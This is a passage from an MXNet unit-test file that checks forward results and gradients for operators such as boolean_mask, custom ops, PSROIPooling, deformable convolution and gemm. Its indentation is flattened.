out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.array([[4, 5, 6]])
expected_grad = np.array([[0, 0, 0], [1, 1, 1], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
# test 0-size output
mx.set_np_shape(True)
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 0, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.zeros((0, 3))
expected_grad = np.array([[0, 0, 0], [0, 0, 0], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
mx.set_np_shape(False)
# test gradient
shape = (100, 30)
a = mx.nd.random.randint(0, 100, shape=shape)
a.attach_grad()
bi = mx.nd.random.randint(0, 100, shape=shape[0:1]) > 50
ci = mx.nd.random.randint(0, 100, shape=shape[0:1]) < 50
mx_grad = mx.nd.zeros_like(a)
mx.autograd.mark_variables([a], [mx_grad], grad_reqs='add')
T = 3
for _ in range(T):
with mx.autograd.record():
b = mx.nd.contrib.boolean_mask(a, bi)
c = mx.nd.contrib.boolean_mask(a, ci)
su = b.sum() + c.sum()
su.backward()
grad = (bi + ci).asnumpy().reshape((-1,) + (1,) * (len(shape)-1))
grad = np.tile(grad, (1,) + shape[1:])
# the gradient accumulates across the T backward passes (grad_req='add')
grad *= T
assert_allclose(a.grad.asnumpy(), grad)
a_np = a.asnumpy()
assert same(b.asnumpy(), a_np[bi.asnumpy().astype('bool')])
assert same(c.asnumpy(), a_np[ci.asnumpy().astype('bool')])
@with_seed()
def test_div_sqrt_dim():
data_tmp = np.random.normal(0, 1, (5, 10, 8))
data = mx.symbol.Variable('data')
test = mx.sym.contrib.div_sqrt_dim(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=1E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp / np.sqrt(data_tmp.shape[-1])])
@with_seed()
def test_reciprocal_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid possible division by 0 errors and finite difference method inaccuracies.
# Factor of 6 below set empirically, depends on eps.
# Issue exposed by seed 879579887.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 6*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.reciprocal(data)
check_numeric_gradient(test, [data_tmp], numeric_eps = eps)
check_symbolic_forward(test, [data_tmp], [np.reciprocal(data_tmp)])
@with_seed()
def test_cbrt_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid finite difference method inaccuracies due to infinite gradient at the origin.
# Factor of 4 below set empirically, depends on eps.
# Issue exposed by seed 553872106.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 4*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.cbrt(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=eps)
check_symbolic_forward(test, [data_tmp], [np.cbrt(data_tmp)])
@with_seed()
def test_rcbrt_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid possible division by 0 errors and finite difference method inaccuracies.
# Factor of 4 below set empirically, depends on eps.
# Issue exposed by seed 788174893.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 4*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.rcbrt(data)
check_numeric_gradient(test, [data_tmp], numeric_eps = eps)
check_symbolic_forward(test, [data_tmp], [1/np.cbrt(data_tmp)])
@with_seed()
def test_custom_op():
class Sqr(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
if in_data[0].stype == 'default':
aux[0][:] = 1
self.assign(out_data[0], req[0], in_data[0]*in_data[0])
else:
inp = in_data[0]
csr_m = inp.data * inp.data
out = mx.nd.sparse.csr_matrix((csr_m, inp.indices, inp.indptr), shape=inp.shape)
self.assign(out_data[0], req[0], out)
if (in_data[0].stype == 'csr'):
assert(isinstance(out_data[0], mx.nd.sparse.CSRNDArray))
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], 2 * mx.nd.sparse.elemwise_mul(in_data[0], out_grad[0]))
if in_data[0].stype == 'default':
assert (aux[0].asnumpy() == 1).all()
@mx.operator.register("sqr")
class SqrProp(mx.operator.CustomOpProp):
def __init__(self):
super(SqrProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['data']
def list_outputs(self):
return ['output']
def list_auxiliary_states(self):
return ['aux']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], [in_shape[0]]
def infer_type(self, in_type):
return in_type, [in_type[0]], [in_type[0]]
def infer_storage_type(self, in_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default']
return ['csr'], ['csr'], ['csr']
def infer_storage_type_backward(self, ograd_stype, in_stype,
out_stype, igrad_stype, aux_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default'], ['default'], ['default']
return ['default'], ['csr'], ['csr'], ['csr'], ['csr']
def create_operator(self, ctx, shapes, dtypes):
return Sqr()
data = mx.symbol.Variable('data')
aux = mx.symbol.Variable('aux')
op = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.cast(data, dtype='float64')
op = mx.symbol.cast(op, dtype='float32')
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.Variable('data', stype='csr')
aux = mx.symbol.Variable('aux')
op2 = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = x.tostype('csr')
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op2, [x], [aux], grad_stype_dict={"data": "csr"})
x2 = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
x2 = x2.tostype('csr')
aux2 = mx.nd.zeros_like(x2)
x2.attach_grad()
with mx.autograd.record():
output = mx.nd.Custom(x2, aux2, name='sqr', op_type='sqr')
output.backward()
expected_output = mx.nd.sparse.square(x2)
expected_grad = 2 * x2
rtol = 1e-4
atol = 1e-6
assert_almost_equal(output, expected_output, rtol=rtol, atol=atol)
assert_almost_equal(x2.grad, expected_grad, rtol=rtol, atol=atol)
# test for backward compatibility, i.e. the correctness of the default implementation
# of storage type inference in custom operators
class Mult(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult")
class MultProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return Mult()
lhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
rhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
lhs.attach_grad()
rhs.attach_grad()
with mx.autograd.record():
y = mx.nd.Custom(lhs, rhs, name='mult', op_type='mult')
y.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class MultNoGrad(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult_no_grad")
class MultNoGradProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultNoGradProp, self).__init__(need_top_grad=False)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return MultNoGrad()
def infer_storage_type_backward(self, ograd_stype, in_stype, out_stype, igrad_stype, aux_stype):
return ograd_stype, in_stype, out_stype, igrad_stype, aux_stype
with mx.autograd.record():
y2 = mx.nd.Custom(lhs, rhs, name="mult_no_grad", op_type="mult_no_grad")
y2.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class NoInputOp(mx.operator.CustomOp):
def __init__(self, length, depth):
super(NoInputOp, self).__init__()
self.output = np.ones(shape=(length, depth), dtype=np.float32)
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], self.output)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register("no_input_op")
class NoInputOpProp(mx.operator.CustomOpProp):
def __init__(self, length, depth):
super(NoInputOpProp, self).__init__()
self.length = int(length)
self.depth = int(depth)
def list_arguments(self):
return []
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return [], [(self.length, self.depth)], []
def infer_type(self, in_type):
return [], [np.float32], []
def create_operator(self, ctx, shapes, dtypes):
return NoInputOp(length=self.length, depth=self.depth)
with mx.autograd.record():
x = mx.nd.Custom(length=10, depth=10, op_type="no_input_op")
assert_almost_equal(x, np.ones(shape=(10, 10), dtype=np.float32))
@pytest.mark.skip(reason="Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/17467")
@with_seed()
def test_custom_op_fork():
# test custom operator fork
# see https://github.com/apache/incubator-mxnet/issues/14396
class AdditionOP(mx.operator.CustomOp):
def __init__(self):
super(AdditionOP, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
out_data[0][:] = in_data[0] + in_data[1]
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
in_grad[0][:] = out_grad[0]
in_grad[1][:] = out_grad[0]
@mx.operator.register("AdditionOP")
class AdditionOPProp(mx.operator.CustomOpProp):
def __init__(self):
super(AdditionOPProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]]
def create_operator(self, ctx, shapes, dtypes):
return AdditionOP()
if not sys.platform.startswith('win'): # no fork in windows
def custom_add():
a = mx.nd.array([1, 2, 3])
b = mx.nd.array([4, 5, 6])
c = mx.nd.Custom(a, b, op_type='AdditionOP')
assert_almost_equal((a + b).asnumpy(), c.asnumpy())
custom_add()
from multiprocessing import Process
p = Process(target=custom_add)
p.daemon = True
p.start()
p.join(5)
assert not p.is_alive() and p.exitcode == 0
def _build_dot_custom(fun_forward, name):
class Dot(mx.operator.CustomOp):
def __init__(self):
super(Dot, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
fun_forward(in_data, out_data)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register(name)
class DotProp(mx.operator.CustomOpProp):
def __init__(self):
super(DotProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [(in_shape[0][0], in_shape[1][1])]
def create_operator(self, ctx, shapes, dtypes):
return Dot()
@with_seed()
def test_custom_op_exc():
# test exception handling
# see https://github.com/apache/incubator-mxnet/pull/14693
# 1. error in python code
def custom_exc1():
def f(in_data, out_data):
assert False
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot1')
a = mx.nd.zeros((4, 1))
b = mx.nd.zeros((1, 4))
c = mx.nd.Custom(a, b, op_type='Dot1')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc1)
# 2. error in pushing operator to engine
def custom_exc2():
def f(in_data, out_data):
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot2')
a = mx.nd.zeros((4, 2))
b = mx.nd.zeros((1, 4))
# trigger error by invalid input shapes of operands
c = mx.nd.Custom(a, b, op_type='Dot2')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc2)
# 3. error in real execution
if default_context().device_type == 'cpu':
def custom_exc3():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# the input to Cholesky factorization must be
# symmetric positive-definite; the zero matrix used
# here is not, so an error is triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
out_data[0].wait_to_read()
_build_dot_custom(f, 'Dot3')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot3')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc3)
def custom_exc4():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# the input to Cholesky factorization must be
# symmetric positive-definite; the zero matrix used
# here is not, so an error is triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
_build_dot_custom(f, 'Dot4')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot4')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc4)
@with_seed()
def test_psroipooling():
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([168, 224], [168, 224]):
for grad_nodes in [['im_data']]:
spatial_scale = 0.0625
feat_height = np.int(image_height * spatial_scale)
feat_width = np.int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1))
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1))
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
op = mx.sym.contrib.PSROIPooling(data=im_data_var, rois=rois_data_var, spatial_scale=spatial_scale,
group_size=num_group, pooled_size=num_group,
output_dim=num_classes, name='test_op')
rtol, atol = 1e-2, 1e-3
check_numeric_gradient(op, [im_data, rois_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes)
@with_seed()
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed()
def test_deformable_convolution():
for num_batch in [1, 2]:
for num_channel_data, num_deformable_group in itertools.product([4, 8], [1, 2]):
for input_height, input_width in itertools.product([5, 6], [5, 6]):
for dilate in [(1, 1), (2, 2)]:
for grad_nodes in [['im_data'], ['offset_data'], ['weight']]:
output_height = input_height
output_width = input_width
im_data = np.random.rand(num_batch, num_channel_data, input_height, input_width)
offset_data = \
np.random.rand(num_batch, num_deformable_group * 3 * 3 * 2, output_height, output_width)\
* 0.8 + 0.1
weight = np.random.normal(0, 0.001, (num_channel_data, num_channel_data, 3, 3))
bias = np.zeros(num_channel_data)
im_data_var = mx.symbol.Variable(name="im_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
weight_var = mx.symbol.Variable(name="weight")
bias_var = mx.symbol.Variable(name="bias")
op = mx.sym.contrib.DeformableConvolution(name='test_op', data=im_data_var,
offset=offset_data_var,
weight=weight_var, bias=bias_var,
num_filter=num_channel_data, pad=dilate,
kernel=(3, 3), stride=(1, 1), dilate=dilate,
num_deformable_group=num_deformable_group)
if grad_nodes[0] == 'offset_data':
# wider tolerance needed for coordinate differential
rtol, atol = 1.0, 1e-2
else:
rtol, atol = 0.05, 1e-3
# Only a GPU implementation exists for now
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, offset_data, weight, bias], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _validate_sample_location(input_rois, input_offset, spatial_scale, pooled_w, pooled_h, sample_per_part, part_size, output_dim, num_classes, trans_std, feat_h, feat_w):
num_rois = input_rois.shape[0]
output_offset = input_offset.copy()
# simulate deformable psroipooling forward function
for roi_idx in range(num_rois):
sub_rois = input_rois[roi_idx, :].astype(np.float32)
img_idx, x0, y0, x1, y1 = int(sub_rois[0]), sub_rois[1], sub_rois[2], sub_rois[3], sub_rois[4]
roi_start_w = round(x0) * spatial_scale - 0.5
roi_start_h = round(y0) * spatial_scale - 0.5
roi_end_w = round(x1 + 1) * spatial_scale - 0.5
roi_end_h = round(y1 + 1) * spatial_scale - 0.5
roi_w, roi_h = roi_end_w - roi_start_w, roi_end_h - roi_start_h
bin_size_w, bin_size_h = roi_w / pooled_w, roi_h / pooled_h
sub_bin_size_w, sub_bin_size_h = bin_size_w / sample_per_part, bin_size_h / sample_per_part
for c_top in range(output_dim):
channel_each_cls = output_dim / num_classes
class_id = int(c_top / channel_each_cls)
for ph in range(pooled_h):
for pw in range(pooled_w):
part_h = int(math.floor(float(ph) / pooled_h * part_size))
part_w = int(math.floor(float(pw) / pooled_w * part_size))
trans_x = input_offset[roi_idx, class_id * 2, part_h, part_w] * trans_std
trans_y = input_offset[roi_idx, class_id * 2 + 1, part_h, part_w] * trans_std
bin_h_start, bin_w_start = ph * bin_size_h + roi_start_h, pw * bin_size_w + roi_start_w
need_check = True
while need_check:
pass_check = True
for ih in range(sample_per_part):
for iw in range(sample_per_part):
h = bin_h_start + trans_y * roi_h + ih * sub_bin_size_h
w = bin_w_start + trans_x * roi_w + iw * sub_bin_size_w
if w < -0.5 or w > feat_w - 0.5 or h < -0.5 or h > feat_h - 0.5:
continue
w = min(max(w, 0.1), feat_w - 1.1)
h = min(max(h, 0.1), feat_h - 1.1)
                                # if the following condition holds, the sampling location is not differentiable
# therefore we need to re-do the sampling process
if h - math.floor(h) < 1e-3 or math.ceil(h) - h < 1e-3 or w - math.floor(w) < 1e-3 or math.ceil(w) - w < 1e-3:
trans_x, trans_y = random.random() * trans_std, random.random() * trans_std
pass_check = False
break
if not pass_check:
break
if pass_check:
output_offset[roi_idx, class_id * 2 + 1, part_h, part_w] = trans_y / trans_std
output_offset[roi_idx, class_id * 2, part_h, part_w] = trans_x / trans_std
need_check = False
return output_offset
@pytest.mark.skip(reason="Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/11713")
@with_seed()
def test_deformable_psroipooling():
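    # Compare numeric gradients of contrib.DeformablePSROIPooling w.r.t. the
    # feature map and the offsets for several ROI counts, class/group counts
    # and image sizes.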
sample_per_part = 4
trans_std = 0.1
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([160, 224], [160, 224]):
for grad_nodes in [['im_data'], ['offset_data']]:
spatial_scale = 0.0625
stride = int(1 / spatial_scale)
                    feat_height = int(image_height * spatial_scale)
                    feat_width = int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1 - 2 * stride)) + stride
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1 - 2 * stride)) + stride
offset_data = np.random.rand(num_rois, 2*num_classes, num_group, num_group)
                    # bilinear interpolation is not differentiable exactly on integer grid points;
                    # adjust the offsets so that every sampling location stays away from such points
offset_data = _validate_sample_location(rois_data, offset_data, spatial_scale, num_group, num_group,
sample_per_part, num_group, num_classes, num_classes, trans_std, feat_height, feat_width)
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
op = mx.sym.contrib.DeformablePSROIPooling(data=im_data_var, rois=rois_data_var,
trans=offset_data_var, spatial_scale=spatial_scale,
sample_per_part=4, group_size=num_group,
pooled_size=num_group, output_dim=num_classes,
trans_std=0.1, no_trans=False, name='test_op')
rtol, atol = 1e-2, 1e-3
                    # Only the GPU implementation exists so far
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, rois_data, offset_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _gemm_test_helper(dtype, grad_check, rtol_fw = 1e-7, atol_fw = 1e-9):
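    # Check linalg.gemm and linalg.gemm2 against NumPy for every transpose
    # combination, for batched inputs and for non-default `axis` values;
    # optionally also run the numeric gradient check.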
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
data3 = mx.symbol.Variable('data3')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
shape1 = (2, 3)
shape2 = (3, 2)
shape3 = (3, 3)
shape4 = (2, 2)
data_in1 = np.random.uniform(1, 10, shape1).astype(dtype)
data_in2 = np.random.uniform(1, 10, shape2).astype(dtype)
data_in3 = np.random.uniform(1, 10, shape3).astype(dtype)
data_in4 = np.random.uniform(1, 10, shape4).astype(dtype)
# Check all transpositions of gemm operator.
data_in1_t = np.transpose(data_in1)
data_in2_t = np.transpose(data_in2)
res_gemm = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [data_in1, data_in2, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in4])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True, transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in3])
res_gemm = 4. * np.dot(data_in1_t, data_in1) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in3])
res_gemm = 4. * np.dot(data_in1, data_in1_t) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in4])
# Check batch of gemm.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
c = rep_3x(data_in4, 2, 2)
r = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
r = rep_3x(r, 2, 2)
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [a, b, c], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b, c])
# Check for different axis that describes matrix rows.
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
c2 = np.copy(np.swapaxes(c, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = 0)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
c2 = np.copy(np.swapaxes(c, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = -3)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
# Check gemm2 operator same way as gemm.
res_gemm = 4. * np.dot(data_in1, data_in2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in1)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
res_gemm = 4. * np.dot(data_in1, data_in1_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
# Check batch of gemm2.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
r = rep_3x(4. * np.dot(data_in1, data_in2), 2, 2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [a, b], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b])
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = 0)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = -3)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
# Test gemm separately from the other linear-algebra operators.
@with_seed()
def test_gemm():
_gemm_test_helper(np.float64, True)
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "0"
_gemm_test_helper(np.float32, False, rtol_fw = 1e-5, atol_fw = 1e-7)
if default_context().device_type == 'gpu':
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "1"
_gemm_test_helper(np.float32, False, rtol_fw = 2e-5, atol_fw = 2e-7)
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "0"
# Helper functions for test_laop
def _make_symm_symbol(a, ndims):
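    # Return the symmetric part 0.5 * (A + A^T), transposing the last two axes.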
assert ndims >= 2
tr_shape = list(range(ndims))
tr_shape[-1] = ndims-2
tr_shape[-2] = ndims-1
tr_shape = tuple(tr_shape)
return 0.5 * (a + mx.sym.transpose(a, axes=tr_shape))
def _make_triangle_symm(a, ndims, m, lower, dtype=np.float32):
assert ndims >= 2
# The last two dimensions must both be m
# Create mask for lower triangle and diagonal
index = mx.sym.arange(start=0, stop=m, step=1, dtype=np.int32)
lt_mask = mx.sym.one_hot(index, depth=m, dtype=dtype)
for j in range(1, m):
part1 = mx.sym.zeros(shape=(j, m), dtype=dtype)
index = mx.sym.arange(start=0, stop=m-j, step=1, dtype=np.int32)
part2 = mx.sym.one_hot(index, depth=m, dtype=dtype)
lt_mask = lt_mask + mx.sym.concat(*[part1, part2], dim=0)
if not lower:
lt_mask = mx.sym.reshape(lt_mask, shape=(m, m))
lt_mask = mx.sym.transpose(lt_mask, axes=(1, 0))
shp = tuple([1]*(ndims-2) + [m, m])
lt_mask = mx.sym.reshape(lt_mask, shape=shp)
return mx.sym.broadcast_mul(a, lt_mask)
# @ankkhedia: Getting rid of fixed seed as flakiness could not be reproduced
# tracked at https://github.com/apache/incubator-mxnet/issues/11718
@xfail_when_nonstandard_decimal_separator
@with_seed()
def test_laop():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 2e-6
rtol_bw = 1e-5
atol_bw = 1e-5
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
def check_fw_grad(sym, location, expected):
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
if grad_check == 1:
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
matrix = np.array([[9., 3., -6., 12.],
[3., 26., -7., -11.],
[-6., -7., 9., 7.],
[12., -11., 7., 65.]])
trian = np.array([[3., 0., 0., 0.],
[1., 5., 0., 0.],
[-2., -1., 2., 0.],
[4., -3., 6., 2.]])
pow = np.array([[2., 1., 1., 1.],
[1., 4., 1., 1.],
[1., 1., 8., 1.],
[1., 1., 1., 16.]])
